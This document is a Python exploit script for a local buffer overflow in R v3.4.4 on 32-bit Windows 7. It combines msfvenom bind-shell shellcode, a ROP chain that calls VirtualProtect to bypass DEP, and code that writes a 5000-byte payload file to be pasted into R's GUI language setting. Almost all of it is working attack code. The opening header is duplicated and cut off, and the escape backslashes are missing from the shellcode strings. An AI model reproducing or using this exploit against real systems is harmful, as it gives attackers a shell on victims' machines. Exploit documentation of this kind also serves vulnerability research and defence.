#!/usr/bin/python
#################################################################################################################
# Exploit Title : R v3.4.4 - Local Buffer Overflow (D #!/usr/bin/python
#################################################################################################################
# Exploit Title : R v3.4.4 - Local Buffer Overflow (DEP Bypass) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : https://www.r-project.org/ #
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe #
# Tested on OS : Microsoft Windows 7 Enterprise - SP1 (x86) #
# Steps to reproduce : under GUI preferences, paste payload.txt contents into 'Language for menus and messages' #
#################################################################################################################

# Credit to bzyo for finding the bug (44516)

import struct

#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "x00x0ax0dx0e" -f python -v shellcode
#Payload size: 718 bytes
shellcode = ""
shellcode += "x89xe0xdbxd2xd9x70xf4x5bx53x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x69x6cx59x78x6cx42x77x70x33x30x37x70"
shellcode += "x31x70x6bx39x6ax45x65x61x39x50x72x44"
shellcode += "x6ex6bx30x50x56x50x4ex6bx62x72x56x6c"
shellcode += "x6cx4bx31x42x34x54x4cx4bx62x52x64x68"
shellcode += "x56x6fx68x37x70x4ax61x36x55x61x79x6f"
shellcode += "x6ex4cx75x6cx73x51x51x6cx67x72x46x4c"
shellcode += "x57x50x4bx71x5ax6fx36x6dx76x61x6bx77"
shellcode += "x7ax42x39x62x76x32x73x67x6ex6bx36x32"
shellcode += "x72x30x4ex6bx73x7ax55x6cx4ex6bx62x6c"
shellcode += "x42x31x72x58x38x63x51x58x35x51x6bx61"
shellcode += "x52x71x4ex6bx72x79x31x30x57x71x78x53"
shellcode += "x6cx4bx50x49x64x58x6bx53x77x4ax70x49"
shellcode += "x6ex6bx37x44x4ex6bx67x71x4bx66x45x61"
shellcode += "x69x6fx6cx6cx49x51x6ax6fx46x6dx57x71"
shellcode += "x5ax67x56x58x39x70x42x55x4bx46x74x43"
shellcode += "x53x4dx59x68x35x6bx73x4dx47x54x64x35"
shellcode += "x5ax44x36x38x6cx4bx56x38x57x54x76x61"
shellcode += "x38x53x43x56x4cx4bx64x4cx30x4bx6cx4b"
shellcode += "x33x68x35x4cx57x71x59x43x6cx4bx36x64"
shellcode += "x6cx4bx46x61x4ex30x6bx39x63x74x47x54"
shellcode += "x55x74x31x4bx43x6bx50x61x71x49x52x7a"
shellcode += "x62x71x6bx4fx6bx50x61x4fx51x4fx32x7a"
shellcode += "x6cx4bx66x72x5ax4bx4cx4dx71x4dx50x68"
shellcode += "x76x53x45x62x65x50x75x50x31x78x73x47"
shellcode += "x71x63x74x72x31x4fx62x74x75x38x50x4c"
shellcode += "x70x77x55x76x36x67x49x6fx6bx65x6dx68"
shellcode += "x7ax30x73x31x55x50x65x50x36x49x78x44"
shellcode += "x33x64x62x70x65x38x65x79x6dx50x30x6b"
shellcode += "x43x30x39x6fx39x45x31x7ax56x68x70x59"
shellcode += "x70x50x69x72x59x6dx37x30x70x50x71x50"
shellcode += "x50x50x33x58x39x7ax46x6fx79x4fx6dx30"
shellcode += "x59x6fx69x45x7ax37x75x38x65x52x43x30"
shellcode += "x37x61x63x6cx4fx79x5ax46x31x7ax34x50"
shellcode += "x30x56x31x47x45x38x39x52x79x4bx66x57"
shellcode += "x42x47x59x6fx5ax75x50x57x51x78x6cx77"
shellcode += "x48x69x54x78x69x6fx6bx4fx59x45x72x77"
shellcode += "x75x38x33x44x7ax4cx75x6bx39x71x49x6f"
shellcode += "x78x55x71x47x6cx57x75x38x70x75x70x6e"
shellcode += "x42x6dx35x31x79x6fx38x55x72x48x70x63"
shellcode += "x42x4dx71x74x37x70x4fx79x79x73x71x47"
shellcode += "x70x57x71x47x74x71x78x76x53x5ax42x32"
shellcode += "x62x79x52x76x6bx52x59x6dx35x36x79x57"
shellcode += "x52x64x35x74x57x4cx37x71x43x31x4ex6d"
shellcode += "x50x44x36x44x56x70x59x56x47x70x42x64"
shellcode += "x46x34x70x50x36x36x50x56x50x56x71x56"
shellcode += "x42x76x30x4ex73x66x76x36x66x33x76x36"
shellcode += "x32x48x42x59x68x4cx55x6fx6dx56x49x6f"
shellcode += "x6bx65x4bx39x59x70x72x6ex70x56x51x56"
shellcode += "x4bx4fx34x70x51x78x34x48x4ex67x37x6d"
shellcode += "x51x70x59x6fx38x55x6dx6bx6cx30x48x35"
shellcode += "x69x32x72x76x62x48x4cx66x5ax35x4fx4d"
shellcode += "x4dx4dx69x6fx4ax75x65x6cx67x76x73x4c"
shellcode += "x47x7ax4fx70x59x6bx4bx50x70x75x57x75"
shellcode += "x6fx4bx53x77x55x43x64x32x52x4fx51x7a"
shellcode += "x53x30x46x33x4bx4fx4bx65x41x41"

'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''

rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x90909090) # nop
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]

buffer = 'x41' * 292 # filler to EIP
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]
buffer += 'x41' * 4 # compensate for pop esi
buffer += rop
buffer += 'x90' * 50
buffer += shellcode
buffer += 'x90' * (5000-292-4-4-len(rop)-50-len(shellcode))

try:
f=open('payload.txt','w')
print '[+] Creating %s bytes evil payload..' %len(buffer)
f.write(buffer)
f.close()
print '[+] File created!'
except Exception as e:
print e